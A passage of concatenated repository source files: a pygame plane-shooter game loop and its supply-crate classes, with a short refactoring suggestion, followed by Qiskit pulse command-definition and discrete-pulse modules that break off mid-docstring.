pygame.mixer.Sound('Wav\\back music\\4级BGM.mp3') level4_backmusic.set_volume(0.1) # background music once level 6 is reached level6_backmusic = pygame.mixer.Sound("Wav\\back music\\6级BGM.mp3") level6_backmusic.set_volume(0.2) supperbig_sound = pygame.mixer.Sound('Wav\\sound\\supperbig_sound.ogg') supperbig_sound.set_volume(0.03) big_sound = pygame.mixer.Sound('Wav\\sound\\big_sound.ogg') big_sound.set_volume(0.1) mid_sound = pygame.mixer.Sound('Wav\\sound\\mid_sound.ogg') mid_sound.set_volume(0.03) small_sound = pygame.mixer.Sound('Wav\\sound\\small_sound.ogg') small_sound.set_volume(0.03) appear_bigplan = pygame.mixer.Sound('Wav\\sound\\大飞机来咯-1_2.ogg') appear_bigplan.set_volume(0.05) die_Myplan = pygame.mixer.Sound('Wav\\sound\\哦豁-.ogg') die_Myplan.set_volume(0.05) GameOver_plan = pygame.mixer.Sound('Wav\\sound\\游戏结束-.ogg') GameOver_plan.set_volume(0.05) boom_sound = pygame.mixer.Sound('Wav\\sound\\核弹.ogg') boom_sound.set_volume(0.5) supply_appear = pygame.mixer.Sound('Wav\\sound\\补给箱已经-.ogg') supply_appear.set_volume(0.05) get_bomb = pygame.mixer.Sound('Wav\\sound\\获得核弹.ogg') get_bomb.set_volume(0.05) too_much_bomb = pygame.mixer.Sound('Wav\\sound\\最大炸弹量.ogg') too_much_bomb.set_volume(0.05) too_much_life = pygame.mixer.Sound('Wav\\sound\\最大生命值.ogg') too_much_life.set_volume(0.05) get_bullet = pygame.mixer.Sound('Wav\\sound\\获得子弹.ogg') get_bullet.set_volume(0.05) get_life = pygame.mixer.Sound('Wav\\sound\\获得生命.ogg') get_life.set_volume(0.05) launch_bullet = pygame.mixer.Sound('Wav\\sound\\普通子弹发射.ogg') launch_bullet.set_volume(0.01) # level-up voice clips level2_sound = pygame.mixer.Sound('Wav\\sound\\二级.ogg') level2_sound.set_volume(0.1) level3_sound = pygame.mixer.Sound('Wav\\sound\\三级_1_1.ogg') level3_sound.set_volume(0.1) level4_sound = pygame.mixer.Sound('Wav\\sound\\四级_1_1.ogg') level4_sound.set_volume(0.1) level5_sound = pygame.mixer.Sound('Wav\\sound\\五级_1_1.ogg') level5_sound.set_volume(0.1) level6_sound = pygame.mixer.Sound('Wav\\sound\\六级_1_1.ogg') level6_sound.set_volume(0.1) # health-bar color definitions BLACK = (0, 0, 0) RED = (224, 30, 30) GREEN = (24, 220, 24) WHITE = (255, 255, 255) Font_color = (191, 239, 255) # add small enemy planes def add_small_enemy(group1, group2, num): for i in range(num): # instantiate an enemy plane e1 = enemyplan.SmallPlan(size) group1.add(e1) group2.add(e1) # add mid-size enemy planes def add_mid_enemy(group1, group2, num): for i in range(num): e2 = enemyplan.MidPlan(size) group1.add(e2) group2.add(e2) # add big enemy planes def add_big_enemy(group1, group2, num): for i in range(num): e3 = enemyplan.BigPlan(size) group1.add(e3) group2.add(e3) # raise enemy plane speed def inc_speed(target, inc): for each in target: each.speed += inc def main(): # frame counter, used with modulo for timing delay = 100 # 
current level level = 1 # score score = 0 # score font score_font = pygame.font.Font('Font\\HYZhuZiMuTouRenW.ttf', 40) # controls sprite image switching switch_image = True # main-loop flag running = True # pause flag pause = False # sound-mute flag voice_pause = False # ensures the record file is only opened once recorded = False # load pause-button images pause_nor_image = pygame.image.load('image\\Pause\\not pause_white.png').convert_alpha() pause_pressd_image = pygame.image.load('image\\Pause\\not pause_gray.png').convert_alpha() resumer_nor_image = pygame.image.load('image\\Pause\\resumer_white.png').convert_alpha() resumer_pressd_image = pygame.image.load('image\\Pause\\resumer_gray.png').convert_alpha() # load sound-button images voice_image_blue = pygame.image.load('image\\voice\\voice (1)_gaitubao_66x66.png').convert_alpha() voice_image_green = pygame.image.load('image\\voice\\voice (2)_gaitubao_66x66.png').convert_alpha() pause_voice_image_blue = pygame.image.load('image\\voice\\pause_voice (1)_gaitubao_66x66.png').convert_alpha() pause_voice_image_green = pygame.image.load('image\\voice\\pause_voice (2)_gaitubao_66x66.png').convert_alpha() # load end-screen, restart, game-over and logo images end_image = pygame.image.load('image\\restart\\G2.png').convert_alpha() end_rect = end_image.get_rect() again_image = pygame.image.load("image\\restart\\重新开始.png").convert_alpha() again_rect = again_image.get_rect() gameover_image = pygame.image.load("image\\restart\\结束游戏.png").convert_alpha() gameover_rect = gameover_image.get_rect() logo_image = pygame.image.load('image\\restart\\ico.png').convert_alpha() logo_font = pygame.image.load('image\\restart\\LogoFont.png').convert_alpha() # game-over font gameover_font = pygame.font.Font("Font\\华文圆体 REGULAR.TTF", 48) # load respawn images reset_life = pygame.image.load('image\\life\\Rese_life.png').convert_alpha() reset_font_image = pygame.image.load('image\\life\\reset_font_life.png').convert_alpha() # load the life UI icon life_image = pygame.image.load('image\\boom\\LIFE.png').convert_alpha() # get the life icon rect life_rect = life_image.get_rect() # font for the remaining-lives counter life_font = pygame.font.Font('Font\\华文圆体 REGULAR.TTF', 45) # number of lives life_num = 3 # load the bomb UI icon boom_image = pygame.image.load('image\\boom\\BOOM.png').convert_alpha() # get the bomb icon rect boom_rect = boom_image.get_rect() # font for the remaining-bombs counter boom_font = pygame.font.Font('Font\\华文圆体 REGULAR.TTF', 45) # number of bombs boom_num = 3 # instantiate supply drops # bullet supply bullet_supply = supply.BulletSupply(size) # bomb supply bomb_supply = supply.BombSupply(size) # life supply life_supply = supply.LifeSupply(size) # hand out a random supply drop every 40 seconds supply_timer = USEREVENT pygame.time.set_timer(supply_timer, 40 * 1000) # timer for how long super bullets stay active double_bullet_timer = USEREVENT + 1 # invincibility timer invincible_timer = USEREVENT + 2 # flag: are super bullets active is_double_bullet = False # get the pause image rect paused_rect = pause_pressd_image.get_rect() # initialize its position paused_rect.left, paused_rect.top = width - paused_rect.width - 5, 5 # icon shown by default paused_image = pause_nor_image # get the sound icon rect voice_rect = voice_image_blue.get_rect() # initialize its position voice_rect.left, voice_rect.top = width - voice_rect.width - 5, 75 # image shown by default voice_image = voice_image_blue # # play the background music: pygame.mixer.music.play(-1) # create the player's plane me = myplan.MyPlan(size) # create normal bullets; set up the list that holds them bullet1 = [] # image index bullet1_index = 0 # number of bullets bullet1_nums = 7 # fill the list with bullet instances for i in range(bullet1_nums): bullet1.append(bullet.Bullet1(me.rect.midtop)) # create super bullets # list that holds them bullet2 = [] # image index bullet2_index = 0 # number of bullets bullet2_nums = 12 # fill the list with bullet instances for i in range(bullet2_nums//2): bullet2.append(bullet.Bullet2((me.rect.centerx-55, me.rect.centery))) bullet2.append(bullet.Bullet2((me.rect.centerx+20, me.rect.centery))) # create enemy planes enemys = pygame.sprite.Group() # create small enemies small_enemy = 
pygame.sprite.Group() add_small_enemy(small_enemy, enemys, 14) # create mid-size enemies mid_enemy = pygame.sprite.Group() add_mid_enemy(mid_enemy, enemys, 6) # create big enemies big_enemy = pygame.sprite.Group() add_big_enemy(big_enemy, enemys, 2) # destruction-animation image indices small_destory_index = 0 mid_destory_index = 0 big_destory_index = 0 me_destory_index = 0 while running: for event in pygame.event.get(): if event.type == pygame.QUIT: sys.exit() elif event.type == MOUSEBUTTONDOWN: if event.button == 1 and paused_rect.collidepoint(event.pos): pause = not pause # pause/resume all game sounds if pause: pygame.time.set_timer(supply_timer, 0) pygame.mixer.music.pause() pygame.mixer.pause() else: pygame.time.set_timer(supply_timer, 40*1000) pygame.mixer.music.unpause() pygame.mixer.unpause() # sound control (folded into this handler: the original duplicate elif on MOUSEBUTTONDOWN could never run) if event.button == 1 and voice_rect.collidepoint(event.pos): voice_pause = not voice_pause elif event.type == MOUSEMOTION: if paused_rect.collidepoint(event.pos): if pause: paused_image = resumer_pressd_image else: paused_image = pause_pressd_image else: if pause: paused_image = resumer_nor_image else: paused_image = pause_nor_image # sound-button hover state (merged likewise; the hovered+muted case now uses pause_voice_image_green instead of the unrelated pause_pressd_image) if voice_rect.collidepoint(event.pos): if voice_pause: voice_image = pause_voice_image_green else: voice_image = voice_image_green else: if voice_pause: voice_image = pause_voice_image_blue else: voice_image = voice_image_blue elif event.type == KEYDOWN: if event.key == K_SPACE: if boom_num: # use one bomb boom_num -= 1 # play the bomb sound boom_sound.play() for each in enemys: # every enemy already on screen is destroyed if each.rect.bottom > 0: each.active = False # did the supply timer fire? elif event.type == supply_timer: supply_appear.play() main_value = randint(0, 20) if main_value % 3 == 0: bomb_supply.reset() if main_value % 3 == 1: life_supply.reset() if main_value % 3 == 2: bullet_supply.reset() elif event.type == double_bullet_timer: is_double_bullet = False pygame.time.set_timer(double_bullet_timer, 0) elif event.type == invincible_timer: me.invincible = False pygame.time.set_timer(invincible_timer, 0) # level / difficulty progression # level 2 if level == 1 and score > 30000: level = 2 level2_sound.play() # add 3 small, 2 mid-size, 1 big enemy add_small_enemy(small_enemy, enemys, 3) add_mid_enemy(mid_enemy, enemys, 2) add_big_enemy(big_enemy, enemys, 1) # speed up small enemies inc_speed(small_enemy, 1) # level 3 elif level == 2 and score > 100000: level = 3 level3_sound.play() # add 4 small, 3 mid-size, 2 big enemies add_small_enemy(small_enemy, enemys, 4) add_mid_enemy(mid_enemy, enemys, 3) add_big_enemy(big_enemy, enemys, 2) # speed up small and mid-size enemies inc_speed(small_enemy, 1) # level 4 elif level == 3 and score > 300000: level = 4 level4_sound.play() pygame.mixer.music.pause() level4_backmusic.play(-1) pygame.time.set_timer(supply_timer, 30 * 1000) # add 6 small, 5 mid-size, 3 big enemies add_small_enemy(small_enemy, enemys, 6) add_mid_enemy(mid_enemy, enemys, 5) add_big_enemy(big_enemy, enemys, 3) # speed up small and mid-size enemies inc_speed(small_enemy, 1) # level 5 elif level == 4 and score > 600000: level = 5 level5_sound.play() # add 8 small, 7 mid-size, 4 big enemies add_small_enemy(small_enemy, enemys, 8) add_mid_enemy(mid_enemy, enemys, 7) add_big_enemy(big_enemy, enemys, 4) # speed up small and mid-size enemies inc_speed(small_enemy, 2) # level 6 elif level == 5 and score > 1000000: level = 6 level6_sound.play() level4_backmusic.stop() level6_backmusic.play(-1) # add 10 small, 9 mid-size, 6 big enemies add_small_enemy(small_enemy, enemys, 10) add_mid_enemy(mid_enemy, enemys, 9) add_big_enemy(big_enemy, enemys, 6) # speed up small and mid-size enemies inc_speed(small_enemy, 2) inc_speed(mid_enemy, 1) # draw the game background screen.blit(people_pause_image, (0, 250)) screen.blit(font_image, (0, 550)) if life_num and not pause: # read keyboard input key_button = 
pygame.key.get_pressed() if key_button[K_w] or key_button[K_UP]: me.moveup() if key_button[K_s] or key_button[K_DOWN]: me.movedown() if key_button[K_a] or key_button[K_LEFT]: me.moveleft() if key_button[K_d] or key_button[K_RIGHT]: me.moveright() screen.blit(background, (0, 0)) # draw the bomb supply and check pickup if bomb_supply.active: bomb_supply.move() screen.blit(bomb_supply.image, bomb_supply.rect) # was it picked up? if pygame.sprite.collide_mask(bomb_supply, me): get_bomb.play() if boom_num < 3: boom_num += 1 if boom_num >= 3: too_much_bomb.play() bomb_supply.active = False # draw the life supply and check pickup if life_supply.active: life_supply.move() screen.blit(life_supply.image, life_supply.rect) # was it picked up? if pygame.sprite.collide_mask(life_supply, me): get_life.play() # the original called get_bomb here; get_life matches the otherwise unused pickup sound if life_num < 3: life_num += 1 if life_num >= 3: too_much_life.play() life_supply.active = False # draw the super-bullet supply if bullet_supply.active: bullet_supply.move() screen.blit(bullet_supply.image, bullet_supply.rect) # was it picked up? if pygame.sprite.collide_mask(bullet_supply, me): get_bullet.play() # enable super bullets is_double_bullet = True pygame.time.set_timer(double_bullet_timer, 20 * 1000) bullet_supply.active = False # fire bullets; delay % 10 caps firing at 10 shots per second if not (delay % 10): launch_bullet.play() if is_double_bullet: bullets = bullet2 bullets[bullet2_index].reset((me.rect.centerx-55, me.rect.centery)) bullets[bullet2_index+1].reset((me.rect.centerx+20, me.rect.centery)) bullet2_index = (bullet2_index + 2) % bullet2_nums else: bullets = bullet1 bullets[bullet1_index].reset((me.rect.centerx-2.5, me.rect.centery)) bullet1_index = (bullet1_index + 1) % bullet1_nums # check bullet hits on enemies for b in bullets: if b.active: b.move() screen.blit(b.image, b.rect) enemy_hit = pygame.sprite.spritecollide(b, enemys, False, pygame.sprite.collide_mask) if enemy_hit: b.active = False for e in enemy_hit: if e in big_enemy or e in mid_enemy: e.hit = True e.energy -= 1 if e.energy == 0: e.active = False else: e.active = False # draw big enemies for each in big_enemy: if each.active: # initial speed each.move() if each.hit: screen.blit(each.image_hit, each.rect) each.hit = False else: screen.blit(each.image, each.rect) # draw the big enemy's health-bar background pygame.draw.line(screen, BLACK, (each.rect.left, each.rect.top - 5), (each.rect.right, each.rect.top - 5), 4) # draw its current health when hit # compute the current health ratio energy_count = each.energy / enemyplan.BigPlan.energy # green above 20 percent of health, otherwise red if energy_count > 0.2: energy_color = GREEN else: energy_color = RED # draw the current health bar pygame.draw.line(screen, energy_color, (each.rect.left, each.rect.top - 5), (each.rect.left + each.rect.width * energy_count, each.rect.top - 5), 4) # play the entrance sound if each.rect.bottom == -100: appear_bigplan.play() else: # play the destruction animation if not (delay % 3): if big_destory_index == 0: big_sound.play() screen.blit(each.destory_images[big_destory_index], each.rect) big_destory_index = (big_destory_index + 1) % 9 if big_destory_index == 0: score += 13140 each.reset() # draw mid-size enemies for each in mid_enemy: if each.active: # initial speed each.move() if each.hit: screen.blit(each.image_hit, each.rect) each.hit = False else: screen.blit(each.image, each.rect) # draw the mid-size enemy's health-bar background pygame.draw.line(screen, BLACK, (each.rect.left, each.rect.top - 5), (each.rect.right, each.rect.top - 5), 3) # draw its current health when hit # compute the current health ratio energy_count = each.energy / enemyplan.MidPlan.energy # green above 20 percent of health, otherwise red if energy_count > 0.2: energy_color = GREEN else: energy_color = RED # draw the current health bar pygame.draw.line(screen, energy_color, (each.rect.left, each.rect.top - 5), (each.rect.left + each.rect.width * energy_count, each.rect.top - 5), 3) else: if not (delay % 3): # play the destruction frames if mid_destory_index == 0: 
mid_sound.play() screen.blit(each.destory_images[mid_destory_index], each.rect) mid_destory_index = (mid_destory_index + 1) % 6 if mid_destory_index == 0: score += 5200 each.reset() # 绘制小型敌机 for each in small_enemy: if each.active: each.move() screen.blit(each.image, each.rect) else: if not (delay % 3): # 毁灭播放图像音频 if small_destory_index == 0: small_sound.play() screen.blit(each.destory_images[small_destory_index], each.rect) small_destory_index = (small_destory_index + 1) % 4 if small_destory_index == 0: score += 520 each.reset() # 我方飞机碰撞检测 enemys_down = pygame.sprite.spritecollide(me, enemys, False, pygame.sprite.collide_mask) if enemys_down and not me.invincible: me.active = False for e in enemys_down: e.active = False # 绘制我方飞机 if me.active: if switch_image: screen.blit(me.image, me.rect) else: screen.blit(me.image1, me.rect) else: # 毁灭图像播放 if me_destory_index == 0: die_Myplan.play() screen.blit(me.destory_image[me_destory_index], me.rect) me_destory_index = (me_destory_index + 1) % 4 if me_destory_index == 0: # 生命值-1 life_num -= 1 # 复活 me.reset() pygame.time.set_timer(invincible_timer, 3 * 1000) for i in range(life_num): if not (delay % 1): screen.blit(reset_font_image, me.rect) # 绘制炸弹UI boom_text = boom_font.render(' x %d ' % boom_num, True, WHITE) text_rect = boom_text.get_rect() screen.blit(boom_image, (5, 150)) screen.blit(boom_text, (75, 150)) # 绘制生命UI life_text = life_font.render(' x %d' % life_num, True, WHITE) text_rect = life_text.get_rect() screen.blit(life_image, (5, 65)) screen.blit(life_text, (75, 65)) # 将分数通过字符串添加到surface对象 score_text = score_font.render('分数: %s' % str(score), True, WHITE) # 绘制分数 screen.blit(score_text, (10, 20)) elif life_num == 0: screen.blit(background, (0, 0)) # 游戏结束背景音乐关闭 pygame.mixer.music.stop() # 停止全部音效 pygame.mixer.stop() # 停止发放补给箱 pygame.time.set_timer(supply_timer, 0) # 用于存写历史记录 if not recorded: recorded = True # 读取历史最高得分 with open("游戏历史记录.txt", "r") as f: record_score = int(f.read()) # 判断当前分数是否高于游戏历史最高记录 if score > record_score: with open("游戏历史记录.txt", "w") as f: f.write(str(score)) # 绘制结束画面 record_score_text = score_font.render("最高分 : %d" \ % record_score, True, (255, 255, 255)) screen.blit(record_score_text, (0, 0)) gameover_text1 = gameover_font.render("最终得分", True, (255, 255, 255)) gameover_text1_rect = gameover_text1.get_rect() gameover_text1_rect.left, gameover_text1_rect.top = \ (width - gameover_text1_rect.width) // 2, height // 3 screen.blit(gameover_text1, gameover_text1_rect) gameover_text2 = gameover_font.render(str(score), True, (255, 255, 255)) gameover_text2_rect = gameover_text2.get_rect() gameover_text2_rect.left, gameover_text2_rect.top = \ (width - gameover_text2_rect.width) // 2, \ gameover_text1_rect.bottom + 10 screen.blit(gameover_text2, (190, 355)) again_rect.left, again_rect.top = \ (width - again_rect.width) // 2, \ gameover_text2_rect.bottom + 50 screen.blit(again_image, again_rect) gameover_rect.left, gameover_rect.top = \ (width - again_rect.width) // 2, \ again_rect.bottom + 10 screen.blit(gameover_image, gameover_rect) # 绘制GAMEOVER字体 screen.blit(end_image, (100, 110)) # 绘制LOGO # LOGO screen.blit(logo_image, (10, 810)) # Font screen.blit(logo_font, (110, 802)) # 检测用户的鼠标操作 # 如果用户按下鼠标左键 if pygame.mouse.get_pressed()[0]: # 获取鼠标坐标 pos = pygame.mouse.get_pos() # 如果用户点击“重新开始” if again_rect.left < pos[0] < again_rect.right and \ again_rect.top < pos[1] < again_rect.bottom: # 调用main函数,重新开始游戏 main() # 如果用户点击“结束游戏” elif gameover_rect.left < pos[0] < gameover_rect.right and \ gameover_rect.top < pos[1] < gameover_rect.bottom: 
# 退出游戏 pygame.quit() sys.exit() # 绘制暂停按钮 screen.blit(paused_image, paused_rect) # 绘制声音按钮 screen.blit(voice_image, voice_rect) if not(delay % 1): switch_image = not switch_image delay -= 1 if not delay: delay = 100 # 游戏图像翻转 pygame.display.flip() # 帧率限制 clock.tick(60) ``` #### File: 90327/Pygame/supply.py ```python import pygame from random import * class BulletSupply(pygame.sprite.Sprite): def __init__(self, size): pygame.sprite.Sprite.__init__(self) self.image = pygame.image.load('image\\boom\\bullet_fly.png') self.width, self.height = size[0], size[1] self.rect = self.image.get_rect() self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100 self.speed = 4 self.active = False self.mask = pygame.mask.from_surface(self.image) def move(self): if self.rect.top < self.height: self.rect.top += self.speed else: self.active = False def reset(self): self.active = True self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100 class BombSupply(pygame.sprite.Sprite): def __init__(self, size): pygame.sprite.Sprite.__init__(self) self.image = pygame.image.load('image\\boom\\bomb_fly.png') self.rect = self.image.get_rect() self.width, self.height = size[0], size[1] self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100 self.speed = 4 self.active = False self.mask = pygame.mask.from_surface(self.image) def move(self): if self.rect.top < self.height: self.rect.top += self.speed else: self.active = False def reset(self): self.active = True self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100 class LifeSupply(pygame.sprite.Sprite): def __init__(self, size): pygame.sprite.Sprite.__init__(self) self.image = pygame.image.load('image\\boom\\fly_life.png') self.width, self.height = size[0], size[1] self.rect = self.image.get_rect() self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100 self.speed = 4 self.active = False self.mask = pygame.mask.from_surface(self.image) def move(self): if self.rect.top < self.height: self.rect.top += self.speed else: self.active = False def reset(self): self.active = True self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100 ```
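The three supply classes above are identical apart from their sprite image, so a shared base class would remove the duplication. A minimal refactor sketch (the `SupplySprite` base class is hypothetical, not part of the repository; the image paths come from the code above):

```python
import pygame
from random import randint


class SupplySprite(pygame.sprite.Sprite):
    """Shared behaviour for all falling supply crates."""
    image_file = None  # set by each subclass

    def __init__(self, size):
        pygame.sprite.Sprite.__init__(self)
        self.image = pygame.image.load(self.image_file)
        self.width, self.height = size[0], size[1]
        self.rect = self.image.get_rect()
        self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100
        self.speed = 4
        self.active = False
        self.mask = pygame.mask.from_surface(self.image)

    def move(self):
        # Fall until the bottom of the screen, then deactivate
        if self.rect.top < self.height:
            self.rect.top += self.speed
        else:
            self.active = False

    def reset(self):
        # Reactivate at a random horizontal position near the top
        self.active = True
        self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100


class BulletSupply(SupplySprite):
    image_file = 'image\\boom\\bullet_fly.png'


class BombSupply(SupplySprite):
    image_file = 'image\\boom\\bomb_fly.png'


class LifeSupply(SupplySprite):
    image_file = 'image\\boom\\fly_life.png'
```

This keeps the public interface (`move`, `reset`, `active`, `mask`) unchanged, so `main.py` would not need to be modified.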
{ "source": "904194705/Qiskit-RIKEN-project-", "score": 3 }
#### File: qiskit/pulse/cmd_def.py ```python from typing import List, Tuple, Iterable, Union, Dict, Optional from qiskit.qobj import PulseQobjInstruction from qiskit.qobj.converters import QobjToInstructionConverter from .commands import SamplePulse from .exceptions import PulseError from .schedule import Schedule, ParameterizedSchedule # pylint: disable=missing-return-doc def _to_qubit_tuple(qubit_tuple: Union[int, Iterable[int]]) -> Tuple[int]: """Convert argument to tuple. Args: qubit_tuple: Qubits to enforce as tuple. Raises: PulseError: If qubits are not integers """ try: qubit_tuple = tuple(qubit_tuple) except TypeError: qubit_tuple = (qubit_tuple,) if not all(isinstance(i, int) for i in qubit_tuple): raise PulseError("All qubits must be integers.") return qubit_tuple class CmdDef: """Command definition class. Relates `Gate`s to `Schedule`s.""" def __init__(self, schedules: Optional[Dict] = None): """Create command definition from backend. Args: schedules: Keys are tuples of (cmd_name, *qubits) and values are `Schedule` or `ParameterizedSchedule` """ self._cmd_dict = {} if schedules: for key, schedule in schedules.items(): self.add(key[0], key[1:], schedule) @classmethod def from_defaults(cls, flat_cmd_def: List[PulseQobjInstruction], pulse_library: Dict[str, SamplePulse]) -> 'CmdDef': """Create command definition from backend defaults output. Args: flat_cmd_def: Command definition list returned by backend pulse_library: Dictionary of `SamplePulse`s """ converter = QobjToInstructionConverter(pulse_library, buffer=0) cmd_def = cls() for cmd in flat_cmd_def: qubits = cmd.qubits name = cmd.name instructions = [] for instr in cmd.sequence: instructions.append(converter(instr)) cmd_def.add(name, qubits, ParameterizedSchedule(*instructions, name=name)) return cmd_def def add(self, cmd_name: str, qubits: Union[int, Iterable[int]], schedule: Union[ParameterizedSchedule, Schedule]): """Add a command to the `CommandDefinition` Args: cmd_name: Name of the command qubits: Qubits command applies to schedule: Schedule to be added """ qubits = _to_qubit_tuple(qubits) cmd_dict = self._cmd_dict.setdefault(cmd_name, {}) if isinstance(schedule, Schedule): schedule = ParameterizedSchedule(schedule, name=schedule.name) cmd_dict[qubits] = schedule def has(self, cmd_name: str, qubits: Union[int, Iterable[int]]) -> bool: """Has command of name with qubits. Args: cmd_name: Name of the command qubits: Ordered list of qubits command applies to """ qubits = _to_qubit_tuple(qubits) if cmd_name in self._cmd_dict: if qubits in self._cmd_dict[cmd_name]: return True return False def get(self, cmd_name: str, qubits: Union[int, Iterable[int]], *params: List[Union[int, float, complex]], **kwparams: Dict[str, Union[int, float, complex]]) -> Schedule: """Get command from command definition. 
Args: cmd_name: Name of the command qubits: Ordered list of qubits command applies to *params: Command parameters to be used to generate schedule **kwparams: Keyworded command parameters to be used to generate schedule Raises: PulseError: If command for qubits is not available """ qubits = _to_qubit_tuple(qubits) if self.has(cmd_name, qubits): schedule = self._cmd_dict[cmd_name][qubits] if isinstance(schedule, ParameterizedSchedule): return schedule.bind_parameters(*params, **kwparams) return schedule.flatten() else: raise PulseError('Command {0} for qubits {1} is not present ' 'in CmdDef'.format(cmd_name, qubits)) def get_parameters(self, cmd_name: str, qubits: Union[int, Iterable[int]]) -> Tuple[str]: """Get command parameters from command definition. Args: cmd_name: Name of the command qubits: Ordered list of qubits command applies to Raises: PulseError: If command for qubits is not available """ qubits = _to_qubit_tuple(qubits) if self.has(cmd_name, qubits): schedule = self._cmd_dict[cmd_name][qubits] return schedule.parameters else: raise PulseError('Command {0} for qubits {1} is not present ' 'in CmdDef'.format(cmd_name, qubits)) def pop(self, cmd_name: str, qubits: Union[int, Iterable[int]], *params: List[Union[int, float, complex]], **kwparams: Dict[str, Union[int, float, complex]]) -> Schedule: """Pop command from command definition. Args: cmd_name: Name of the command qubits: Ordered list of qubits command applies to *params: Command parameters to be used to generate schedule **kwparams: Keyworded command parameters to be used to generate schedule Raises: PulseError: If command for qubits is not available """ qubits = _to_qubit_tuple(qubits) if self.has(cmd_name, qubits): cmd_dict = self._cmd_dict[cmd_name] schedule = cmd_dict.pop(qubits) if isinstance(schedule, ParameterizedSchedule): return schedule.bind_parameters(*params, **kwparams) return schedule else: raise PulseError('Command {0} for qubits {1} is not present ' 'in CmdDef'.format(cmd_name, qubits)) def cmds(self) -> List[str]: """Return all command names available in CmdDef.""" return list(self._cmd_dict.keys()) def cmd_qubits(self, cmd_name: str) -> List[Tuple[int]]: """Get all qubit orderings this command exists for.""" if cmd_name in self._cmd_dict: return list(sorted(self._cmd_dict[cmd_name].keys())) return [] def __repr__(self): return repr(self._cmd_dict) ``` #### File: pulse/pulse_lib/discrete.py ```python from typing import Optional from qiskit.pulse.commands import SamplePulse from qiskit.pulse.pulse_lib import continuous from qiskit.pulse import samplers _sampled_constant_pulse = samplers.left(continuous.constant) def constant(duration: int, amp: complex, name: Optional[str] = None) -> SamplePulse: """Generates constant-sampled `SamplePulse`. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Complex pulse amplitude. name: Name of pulse. """ return _sampled_constant_pulse(duration, amp, name=name) _sampled_zero_pulse = samplers.left(continuous.zero) def zero(duration: int, name: Optional[str] = None) -> SamplePulse: """Generates zero-sampled `SamplePulse`. Args: duration: Duration of pulse. Must be greater than zero. name: Name of pulse. """ return _sampled_zero_pulse(duration, name=name) _sampled_square_pulse = samplers.left(continuous.square) def square(duration: int, amp: complex, period: float = None, phase: float = 0, name: Optional[str] = None) -> SamplePulse: """Generates square wave `SamplePulse`. 
Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude. Wave range is [-amp, amp]. period: Pulse period, units of dt. If `None` defaults to single cycle. phase: Pulse phase. name: Name of pulse. """ if period is None: period = duration return _sampled_square_pulse(duration, amp, period, phase=phase, name=name) _sampled_sawtooth_pulse = samplers.left(continuous.sawtooth) def sawtooth(duration: int, amp: complex, period: float = None, phase: float = 0, name: Optional[str] = None) -> SamplePulse: """Generates sawtooth wave `SamplePulse`. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude. Wave range is [-amp, amp]. period: Pulse period, units of dt. If `None` defaults to single cycle. phase: Pulse phase. name: Name of pulse. """ if period is None: period = duration return _sampled_sawtooth_pulse(duration, amp, period, phase=phase, name=name) _sampled_triangle_pulse = samplers.left(continuous.triangle) def triangle(duration: int, amp: complex, period: float = None, phase: float = 0, name: Optional[str] = None) -> SamplePulse: """Generates triangle wave `SamplePulse`. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude. Wave range is [-amp, amp]. period: Pulse period, units of dt. If `None` defaults to single cycle. phase: Pulse phase. name: Name of pulse. """ if period is None: period = duration return _sampled_triangle_pulse(duration, amp, period, phase=phase, name=name) _sampled_cos_pulse = samplers.left(continuous.cos) def cos(duration: int, amp: complex, freq: float = None, phase: float = 0, name: Optional[str] = None) -> SamplePulse: """Generates cosine wave `SamplePulse`. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude. freq: Pulse frequency, units of 1/dt. If `None` defaults to single cycle. phase: Pulse phase. name: Name of pulse. """ if freq is None: freq = 1/duration return _sampled_cos_pulse(duration, amp, freq, phase=phase, name=name) _sampled_sin_pulse = samplers.left(continuous.sin) def sin(duration: int, amp: complex, freq: float = None, phase: float = 0, name: Optional[str] = None) -> SamplePulse: """Generates sine wave `SamplePulse`. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude. freq: Pulse frequency, units of 1/dt. If `None` defaults to single cycle. phase: Pulse phase. name: Name of pulse. """ if freq is None: freq = 1/duration return _sampled_sin_pulse(duration, amp, freq, phase=phase, name=name) _sampled_gaussian_pulse = samplers.left(continuous.gaussian) def gaussian(duration: int, amp: complex, sigma: float, name: Optional[str] = None) -> SamplePulse: r"""Generates unnormalized gaussian `SamplePulse`. Centered at `duration/2` and zeroed at `t=-1` to prevent large initial discontinuity. Applies `left` sampling strategy to generate discrete pulse from continuous function. Integrated area under curve is $\Omega_g(amp, sigma) = amp \times np.sqrt(2\pi \sigma^2)$ Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude at `duration/2`. sigma: Width (standard deviation) of pulse. name: Name of pulse. 
""" center = duration/2 zeroed_width = duration + 2 return _sampled_gaussian_pulse(duration, amp, center, sigma, zeroed_width=zeroed_width, rescale_amp=True, name=name) _sampled_gaussian_deriv_pulse = samplers.left(continuous.gaussian_deriv) def gaussian_deriv(duration: int, amp: complex, sigma: float, name: Optional[str] = None) -> SamplePulse: r"""Generates unnormalized gaussian derivative `SamplePulse`. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude at `center`. sigma: Width (standard deviation) of pulse. name: Name of pulse. """ center = duration/2 return _sampled_gaussian_deriv_pulse(duration, amp, center, sigma, name=name) _sampled_sech_pulse = samplers.left(continuous.sech) def sech(duration: int, amp: complex, sigma: float, name: str = None) -> SamplePulse: r"""Generates unnormalized sech `SamplePulse`. Centered at `duration/2` and zeroed at `t=-1` to prevent large initial discontinuity. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. 